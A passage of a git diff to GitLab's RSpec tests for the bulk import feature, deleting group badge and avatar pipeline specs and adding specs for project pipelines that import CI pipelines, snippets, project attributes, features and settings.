end + end +end diff --git a/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb b/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb deleted file mode 100644 index 9fa35c4707d..00000000000 --- a/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb +++ /dev/null @@ -1,116 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Pipelines::BadgesPipeline do - let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - - let_it_be(:entity) do - create( - :bulk_import_entity, - source_full_path: 'source/full/path', - destination_name: 'My Destination Group', - destination_namespace: group.full_path, - group: group - ) - end - - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - - subject { described_class.new(context) } - - describe '#run' do - it 'imports a group badge' do - first_page = extracted_data(has_next_page: true) - last_page = extracted_data(name: 'badge2') - - allow_next_instance_of(BulkImports::Common::Extractors::RestExtractor) do |extractor| - allow(extractor) - .to receive(:extract) - .and_return(first_page, last_page) - end - - expect { subject.run }.to change(Badge, :count).by(2) - - badge = group.badges.last - - expect(badge.name).to eq('badge2') - expect(badge.link_url).to eq(badge_data['link_url']) - expect(badge.image_url).to eq(badge_data['image_url']) - end - - describe '#load' do - it 'creates a badge' do - expect { subject.load(context, badge_data) }.to change(Badge, :count).by(1) - - badge = group.badges.first - - badge_data.each do |key, value| - expect(badge[key]).to eq(value) - end - end - - it 'does nothing when the data is blank' do - expect { subject.load(context, nil) }.not_to change(Badge, :count) - end - end - - describe '#transform' do - it 'return transformed badge hash' do - badge = subject.transform(context, badge_data) - - expect(badge[:name]).to eq('badge') - expect(badge[:link_url]).to eq(badge_data['link_url']) - expect(badge[:image_url]).to eq(badge_data['image_url']) - expect(badge.keys).to contain_exactly(:name, :link_url, :image_url) - end - - context 'when data is blank' do - it 'does nothing when the data is blank' do - expect(subject.transform(context, nil)).to be_nil - end - end - end - - describe 'pipeline parts' do - it { expect(described_class).to include_module(BulkImports::Pipeline) } - it { expect(described_class).to include_module(BulkImports::Pipeline::Runner) } - - it 'has extractors' do - expect(described_class.get_extractor) - .to eq( - klass: BulkImports::Common::Extractors::RestExtractor, - options: { - query: BulkImports::Groups::Rest::GetBadgesQuery - } - ) - end - - it 'has transformers' do - expect(described_class.transformers) - .to contain_exactly( - { klass: BulkImports::Common::Transformers::ProhibitedAttributesTransformer, options: nil } - ) - end - end - - def badge_data(name = 'badge') - { - 'name' => name, - 'link_url' => 'https://gitlab.example.com', - 'image_url' => 'https://gitlab.example.com/image.png' - } - end - - def extracted_data(name: 'badge', has_next_page: false) - page_info = { - 'has_next_page' => has_next_page, - 'next_page' => has_next_page ? '2' : nil - } - - BulkImports::Pipeline::ExtractedData.new(data: [badge_data(name)], page_info: page_info) - end - end -end diff --git a/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb b/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb deleted file mode 100644 index c68284aa580..00000000000 --- a/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb +++ /dev/null @@ -1,77 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Pipelines::GroupAvatarPipeline do - let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - let_it_be(:bulk_import) { create(:bulk_import, user: user) } - - let_it_be(:entity) do - create( - :bulk_import_entity, - group: group, - bulk_import: bulk_import, - source_full_path: 'source/full/path', - destination_name: 'My Destination Group', - destination_namespace: group.full_path - ) - end - - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - - subject { described_class.new(context) } - - describe '#run' do - it 'updates the group avatar' do - avatar_path = 'spec/fixtures/dk.png' - stub_file_download( - avatar_path, - configuration: context.configuration, - relative_url: "/groups/source%2Ffull%2Fpath/avatar", - dir: an_instance_of(String), - file_size_limit: Avatarable::MAXIMUM_FILE_SIZE, - allowed_content_types: described_class::ALLOWED_AVATAR_DOWNLOAD_TYPES - ) - - expect { subject.run }.to change(context.group, :avatar) - - expect(context.group.avatar.filename).to eq(File.basename(avatar_path)) - end - - it 'raises an error when the avatar upload fails' do - avatar_path = 'spec/fixtures/aosp_manifest.xml' - stub_file_download( - avatar_path, - configuration: context.configuration, - relative_url: "/groups/source%2Ffull%2Fpath/avatar", - dir: an_instance_of(String), - file_size_limit: Avatarable::MAXIMUM_FILE_SIZE, - allowed_content_types: described_class::ALLOWED_AVATAR_DOWNLOAD_TYPES - ) - - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger).to receive(:error) - .with( - bulk_import_id: context.bulk_import.id, - bulk_import_entity_id: context.entity.id, - bulk_import_entity_type: context.entity.source_type, - context_extra: context.extra, - exception_class: "BulkImports::Groups::Pipelines::GroupAvatarPipeline::GroupAvatarLoadingError", - exception_message: "Avatar file format is not supported. Please try one of the following supported formats: image/png, image/jpeg, image/gif, image/bmp, image/tiff, image/vnd.microsoft.icon", - pipeline_class: "BulkImports::Groups::Pipelines::GroupAvatarPipeline", - pipeline_step: :loader - ) - end - - expect { subject.run }.to change(BulkImports::Failure, :count) - end - end - - def stub_file_download(filepath = 'file/path.png', **params) - expect_next_instance_of(BulkImports::FileDownloadService, params.presence) do |downloader| - expect(downloader).to receive(:execute).and_return(filepath) - end - end -end diff --git a/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb b/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb deleted file mode 100644 index eef6848e118..00000000000 --- a/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb +++ /dev/null @@ -1,22 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Rest::GetBadgesQuery do - describe '.to_h' do - it 'returns query resource and page info' do - entity = create(:bulk_import_entity) - tracker = create(:bulk_import_tracker, entity: entity) - context = BulkImports::Pipeline::Context.new(tracker) - encoded_full_path = ERB::Util.url_encode(entity.source_full_path) - expected = { - resource: ['groups', encoded_full_path, 'badges'].join('/'), - query: { - page: context.tracker.next_page - } - } - - expect(described_class.to_h(context)).to eq(expected) - end - end -end diff --git a/spec/lib/bulk_imports/groups/stage_spec.rb b/spec/lib/bulk_imports/groups/stage_spec.rb index 5719acac4d7..55a8e40f480 100644 --- a/spec/lib/bulk_imports/groups/stage_spec.rb +++ b/spec/lib/bulk_imports/groups/stage_spec.rb @@ -8,13 +8,13 @@ RSpec.describe BulkImports::Groups::Stage do let(:pipelines) do [ [0, BulkImports::Groups::Pipelines::GroupPipeline], - [1, BulkImports::Groups::Pipelines::GroupAvatarPipeline], [1, BulkImports::Groups::Pipelines::SubgroupEntitiesPipeline], [1, BulkImports::Groups::Pipelines::MembersPipeline], [1, BulkImports::Common::Pipelines::LabelsPipeline], [1, BulkImports::Common::Pipelines::MilestonesPipeline], - [1, BulkImports::Groups::Pipelines::BadgesPipeline], - [2, BulkImports::Common::Pipelines::BoardsPipeline] + [1, BulkImports::Common::Pipelines::BadgesPipeline], + [2, BulkImports::Common::Pipelines::BoardsPipeline], + [2, BulkImports::Common::Pipelines::UploadsPipeline] ] end @@ -24,7 +24,7 @@ RSpec.describe BulkImports::Groups::Stage do describe '.pipelines' do it 'list all the pipelines with their stage number, ordered by stage' do - expect(described_class.new(bulk_import).pipelines & pipelines).to eq(pipelines) + expect(described_class.new(bulk_import).pipelines & pipelines).to contain_exactly(*pipelines) expect(described_class.new(bulk_import).pipelines.last.last).to eq(BulkImports::Common::Pipelines::EntityFinisher) end diff --git a/spec/lib/bulk_imports/ndjson_pipeline_spec.rb b/spec/lib/bulk_imports/ndjson_pipeline_spec.rb index c5197fb29d9..8ea6ceb7619 100644 --- a/spec/lib/bulk_imports/ndjson_pipeline_spec.rb +++ b/spec/lib/bulk_imports/ndjson_pipeline_spec.rb @@ -130,6 +130,22 @@ RSpec.describe BulkImports::NdjsonPipeline do subject.transform(context, data) end + + context 'when data is nil' do + before do + expect(Gitlab::ImportExport::Group::RelationFactory).not_to receive(:create) + end + + it 'returns' do + expect(subject.transform(nil, nil)).to be_nil + end + + context 'when relation hash is nil' do + it 'returns' do + expect(subject.transform(nil, [nil, 0])).to be_nil + end + end + end end describe '#load' do @@ -143,16 +159,6 @@ RSpec.describe BulkImports::NdjsonPipeline do end end - context 'when object is persisted' do - it 'does not save the object' do - object = double(persisted?: true) - - expect(object).not_to receive(:save!) - - subject.load(nil, object) - end - end - context 'when object is missing' do it 'returns' do expect(subject.load(nil, nil)).to be_nil diff --git a/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb b/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb new file mode 100644 index 00000000000..b680fa5cbfc --- /dev/null +++ b/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb @@ -0,0 +1,58 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Graphql::GetSnippetRepositoryQuery do + describe 'query repository based on full_path' do + let_it_be(:entity) { create(:bulk_import_entity) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + it 'has a valid query' do + query = GraphQL::Query.new( + GitlabSchema, + described_class.to_s, + variables: described_class.variables(context) + ) + result = GitlabSchema.static_validator.validate(query) + + expect(result[:errors]).to be_empty + end + + it 'returns snippet httpUrlToRepo' do + expect(described_class.to_s).to include('httpUrlToRepo') + end + + it 'returns snippet createdAt' do + expect(described_class.to_s).to include('createdAt') + end + + it 'returns snippet title' do + expect(described_class.to_s).to include('title') + end + + describe '.variables' do + it 'queries project based on source_full_path and pagination' do + expected = { full_path: entity.source_full_path, cursor: nil, per_page: 500 } + + expect(described_class.variables(context)).to eq(expected) + end + end + + describe '.data_path' do + it '.data_path returns data path' do + expected = %w[data project snippets nodes] + + expect(described_class.data_path).to eq(expected) + end + end + + describe '.page_info_path' do + it '.page_info_path returns pagination information path' do + expected = %w[data project snippets page_info] + + expect(described_class.page_info_path).to eq(expected) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb new file mode 100644 index 00000000000..e2744a6a457 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb @@ -0,0 +1,52 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::AutoDevopsPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:auto_devops) do + { + 'created_at' => '2016-06-13T15:02:47.967Z', + 'updated_at' => '2016-06-14T15:02:47.967Z', + 'enabled' => true, + 'deploy_strategy' => 'continuous' + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports auto devops options into destination project' do + group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [auto_devops])) + end + + pipeline.run + + expect(project.auto_devops.enabled).to be_truthy + expect(project.auto_devops.deploy_strategy).to eq('continuous') + expect(project.auto_devops.created_at).to eq('2016-06-13T15:02:47.967Z') + expect(project.auto_devops.updated_at).to eq('2016-06-14T15:02:47.967Z') + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb new file mode 100644 index 00000000000..98a2e8b6a57 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb @@ -0,0 +1,176 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::CiPipelinesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let(:ci_pipeline_attributes) { {} } + let(:ci_pipeline) do + { + sha: "fakesha", + ref: "fakeref", + project: project, + source: "web" + }.merge(ci_pipeline_attributes) + end + + let(:ci_pipeline2) do + { + sha: "fakesha2", + ref: "fakeref2", + project: project, + source: "web" + }.merge(ci_pipeline_attributes) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + before do + group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return( + BulkImports::Pipeline::ExtractedData.new(data: [ci_pipeline, ci_pipeline2]) + ) + end + + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_source_branch!) + end + + pipeline.run + end + + it 'imports Ci::Pipeline into destination project' do + expect(project.all_pipelines.count).to eq(2) + expect(project.ci_pipelines.first.sha).to eq('fakesha') + expect(project.ci_pipelines.second.sha).to eq('fakesha2') + end + + context 'notes' do + let(:ci_pipeline_attributes) do + { + 'notes' => [ + { + 'note' => 'test note', + 'author_id' => 22, + 'noteable_type' => 'Commit', + 'sha' => '', + 'author' => { + 'name' => 'User 22' + }, + 'commit_id' => 'fakesha', + 'updated_at' => '2016-06-14T15:02:47.770Z', + 'events' => [ + { + 'action' => 'created', + 'author_id' => 22 + } + ] + } + ] + } + end + + it 'imports pipeline with notes' do + note = project.all_pipelines.first.notes.first + expect(note.note).to include('test note') + expect(note.events.first.action).to eq('created') + end + end + + context 'stages' do + let(:ci_pipeline_attributes) do + { + 'stages' => [ + { + 'name' => 'test stage', + 'statuses' => [ + { + 'name' => 'first status', + 'status' => 'created' + } + ] + } + ] + } + end + + it 'imports pipeline with notes' do + stage = project.all_pipelines.first.stages.first + expect(stage.name).to eq('test stage') + expect(stage.statuses.first.name).to eq('first status') + end + end + + context 'external pull request' do + let(:ci_pipeline_attributes) do + { + 'source' => 'external_pull_request_event', + 'external_pull_request' => { + 'source_branch' => 'test source branch', + 'target_branch' => 'master', + 'source_sha' => 'testsha', + 'target_sha' => 'targetsha', + 'source_repository' => 'test repository', + 'target_repository' => 'test repository', + 'status' => 1, + 'pull_request_iid' => 1 + } + } + end + + it 'imports pipeline with external pull request' do + pull_request = project.all_pipelines.first.external_pull_request + expect(pull_request.source_branch).to eq('test source branch') + expect(pull_request.status).to eq('open') + end + end + + context 'merge request' do + let(:ci_pipeline_attributes) do + { + 'source' => 'merge_request_event', + 'merge_request' => { + 'description' => 'test merge request', + 'title' => 'test MR', + 'source_branch' => 'test source branch', + 'target_branch' => 'master', + 'source_sha' => 'testsha', + 'target_sha' => 'targetsha', + 'source_repository' => 'test repository', + 'target_repository' => 'test repository', + 'target_project_id' => project.id, + 'source_project_id' => project.id, + 'author_id' => user.id + } + } + end + + it 'imports pipeline with external pull request' do + merge_request = project.all_pipelines.first.merge_request + expect(merge_request.source_branch).to eq('test source branch') + expect(merge_request.description).to eq('test merge request') + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb new file mode 100644 index 00000000000..9dac8e45ef9 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ContainerExpirationPolicyPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let_it_be(:policy) do + { + 'created_at' => '2019-12-13 13:45:04 UTC', + 'updated_at' => '2019-12-14 13:45:04 UTC', + 'next_run_at' => '2019-12-15 13:45:04 UTC', + 'name_regex' => 'test', + 'name_regex_keep' => 'regex_keep', + 'cadence' => '3month', + 'older_than' => '1month', + 'keep_n' => 100, + 'enabled' => true + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[policy, 0]])) + end + + pipeline.run + + policy.each_pair do |key, value| + expect(entity.project.container_expiration_policy.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb new file mode 100644 index 00000000000..12713f008bb --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::PipelineSchedulesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:schedule_attributes) { {} } + let(:schedule) do + { + 'description' => 'test pipeline schedule', + 'cron' => '1 1 1 1 1', + 'cron_timezone' => 'UTC', + 'ref' => 'testref', + 'created_at' => '2016-06-13T15:02:47.967Z', + 'updated_at' => '2016-06-14T15:02:47.967Z' + }.merge(schedule_attributes) + end + + subject(:pipeline) { described_class.new(context) } + + before do + group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [schedule])) + end + + pipeline.run + end + + it 'imports schedule into destination project' do + expect(project.pipeline_schedules.count).to eq(1) + pipeline_schedule = project.pipeline_schedules.first + schedule.each do |k, v| + expect(pipeline_schedule.send(k)).to eq(v) + end + end + + context 'is active' do + let(:schedule_attributes) { { 'active' => true } } + + it 'imports the schedule but active is false' do + expect(project.pipeline_schedules.first.active).to be_falsey + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb new file mode 100644 index 00000000000..11c475318bb --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb @@ -0,0 +1,159 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ProjectAttributesPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:bulk_import) { create(:bulk_import) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project, bulk_import: bulk_import) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:tmpdir) { Dir.mktmpdir } + let(:extra) { {} } + let(:project_attributes) do + { + 'description' => 'description', + 'visibility_level' => 0, + 'archived' => false, + 'merge_requests_template' => 'test', + 'merge_requests_rebase_enabled' => true, + 'approvals_before_merge' => 0, + 'reset_approvals_on_push' => true, + 'merge_requests_ff_only_enabled' => true, + 'issues_template' => 'test', + 'shared_runners_enabled' => true, + 'build_coverage_regex' => 'build_coverage_regex', + 'build_allow_git_fetch' => true, + 'build_timeout' => 3600, + 'pending_delete' => false, + 'public_builds' => true, + 'last_repository_check_failed' => nil, + 'only_allow_merge_if_pipeline_succeeds' => true, + 'has_external_issue_tracker' => false, + 'request_access_enabled' => true, + 'has_external_wiki' => false, + 'ci_config_path' => nil, + 'only_allow_merge_if_all_discussions_are_resolved' => true, + 'printing_merge_request_link_enabled' => true, + 'auto_cancel_pending_pipelines' => 'enabled', + 'service_desk_enabled' => false, + 'delete_error' => nil, + 'disable_overriding_approvers_per_merge_request' => true, + 'resolve_outdated_diff_discussions' => true, + 'jobs_cache_index' => nil, + 'external_authorization_classification_label' => nil, + 'pages_https_only' => false, + 'merge_requests_author_approval' => false, + 'merge_requests_disable_committers_approval' => true, + 'require_password_to_approve' => true, + 'remove_source_branch_after_merge' => true, + 'autoclose_referenced_issues' => true, + 'suggestion_commit_message' => 'Test!' + }.merge(extra) + end + + subject(:pipeline) { described_class.new(context) } + + before do + allow(Dir).to receive(:mktmpdir).and_return(tmpdir) + end + + after do + FileUtils.remove_entry(tmpdir) if Dir.exist?(tmpdir) + end + + describe '#run' do + before do + allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: project_attributes)) + + pipeline.run + end + + it 'imports project attributes', :aggregate_failures do + project_attributes.each_pair do |key, value| + expect(project.public_send(key)).to eq(value) + end + end + + context 'when project is archived' do + let(:extra) { { 'archived' => true } } + + it 'sets project as archived' do + expect(project.archived).to eq(true) + end + end + end + + describe '#extract' do + before do + file_download_service = instance_double("BulkImports::FileDownloadService") + file_decompression_service = instance_double("BulkImports::FileDecompressionService") + + expect(BulkImports::FileDownloadService) + .to receive(:new) + .with( + configuration: context.configuration, + relative_url: "/#{entity.pluralized_name}/#{entity.source_full_path}/export_relations/download?relation=self", + dir: tmpdir, + filename: 'self.json.gz') + .and_return(file_download_service) + + expect(BulkImports::FileDecompressionService) + .to receive(:new) + .with(dir: tmpdir, filename: 'self.json.gz') + .and_return(file_decompression_service) + + expect(file_download_service).to receive(:execute) + expect(file_decompression_service).to receive(:execute) + end + + it 'downloads, decompresses & decodes json' do + allow(pipeline).to receive(:json_attributes).and_return("{\"test\":\"test\"}") + + extracted_data = pipeline.extract(context) + + expect(extracted_data.data).to match_array([{ 'test' => 'test' }]) + end + + context 'when json parsing error occurs' do + it 'raises an error' do + allow(pipeline).to receive(:json_attributes).and_return("invalid") + + expect { pipeline.extract(context) }.to raise_error(BulkImports::Error) + end + end + end + + describe '#transform' do + it 'removes prohibited attributes from hash' do + input = { 'description' => 'description', 'issues' => [], 'milestones' => [], 'id' => 5 } + + expect(Gitlab::ImportExport::AttributeCleaner).to receive(:clean).and_call_original + + expect(pipeline.transform(context, input)).to eq({ 'description' => 'description' }) + end + end + + describe '#load' do + it 'assigns attributes, drops visibility and reconciles shared runner setting' do + expect(project).to receive(:assign_attributes).with(project_attributes) + expect(project).to receive(:reconcile_shared_runners_setting!) + expect(project).to receive(:drop_visibility_level!) + expect(project).to receive(:save!) + + pipeline.load(context, project_attributes) + end + end + + describe '#json_attributes' do + it 'reads raw json from file' do + filepath = File.join(tmpdir, 'self.json') + + FileUtils.touch(filepath) + expect_file_read(filepath) + + pipeline.json_attributes + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb new file mode 100644 index 00000000000..1f0defdd20c --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ProjectFeaturePipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + let_it_be(:project_feature) do + { + "builds_access_level": 10, + "wiki_access_level": 10, + "issues_access_level": 10, + "merge_requests_access_level": 10, + "snippets_access_level": 10, + "repository_access_level": 10, + "pages_access_level": 10, + "forking_access_level": 10, + "metrics_dashboard_access_level": 10, + "operations_access_level": 10, + "analytics_access_level": 10, + "security_and_compliance_access_level": 10, + "container_registry_access_level": 10, + "updated_at": "2016-09-23T11:58:28.000Z", + "created_at": "2014-12-26T09:26:45.000Z" + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[project_feature, 0]])) + end + + pipeline.run + + project_feature.each_pair do |key, value| + expect(entity.project.project_feature.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb index 583485faf8d..38b22538e70 100644 --- a/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb +++ b/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb @@ -47,6 +47,17 @@ RSpec.describe BulkImports::Projects::Pipelines::RepositoryPipeline do end end + context 'project has no repository' do + let(:project_data) { { 'httpUrlToRepo' => '' } } + + it 'skips repository import' do + expect(context.portable).not_to receive(:ensure_repository) + expect(context.portable.repository).not_to receive(:fetch_as_mirror) + + pipeline.run + end + end + context 'blocked local networks' do let(:project_data) { { 'httpUrlToRepo' => 'http://localhost/foo.git' } } diff --git a/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb new file mode 100644 index 00000000000..2dfa036fc48 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ServiceDeskSettingPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + let_it_be(:setting) { { 'issue_template_key' => 'test', 'project_key' => 'key' } } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[setting, 0]])) + end + + pipeline.run + + setting.each_pair do |key, value| + expect(entity.project.service_desk_setting.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb new file mode 100644 index 00000000000..dae879de998 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb @@ -0,0 +1,119 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::SnippetsPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:snippet_attributes) { {} } + let(:exported_snippet) do + { + 'id' => 25, + 'title' => 'Snippet with 2 files', + 'content' => 'content', + 'author_id' => 22, + 'project_id' => 6, + 'created_at' => '2021-10-28T20:21:59.712Z', + 'updated_at' => '2021-10-28T20:31:10.408Z', + 'file_name' => 'galactic_empire.rb', + 'visibility_level' => 0, + 'description' => 'How to track your Galactic armies.' + }.merge(snippet_attributes) + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + before do + group.add_owner(user) + snippet_with_index = [exported_snippet.dup, 0] + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [snippet_with_index])) + end + + pipeline.run + end + + it 'imports snippet into destination project' do + imported_snippet = project.snippets.last + + expect(imported_snippet).to have_attributes( + title: exported_snippet['title'], + content: exported_snippet['content'], + author_id: user.id, + created_at: DateTime.parse(exported_snippet['created_at']), + updated_at: DateTime.parse(exported_snippet['updated_at']), + file_name: exported_snippet['file_name'], + visibility_level: exported_snippet['visibility_level']) + end + + context 'with award_emoji' do + let(:snippet_attributes) { { 'award_emoji' => [expected_award] } } + let(:expected_award) do + { + 'id' => 580, + 'name' => 'rocket', + 'user_id' => 1, + 'awardable_type' => 'Snippet', + 'created_at' => '2021-10-28T20:30:25.802Z', + 'updated_at' => '2021-10-28T20:30:25.802Z' + } + end + + it 'restores the award_emoji' do + snippet_award = project.snippets.first.award_emoji.first + + expect(snippet_award).to have_attributes( + name: expected_award['name'], + 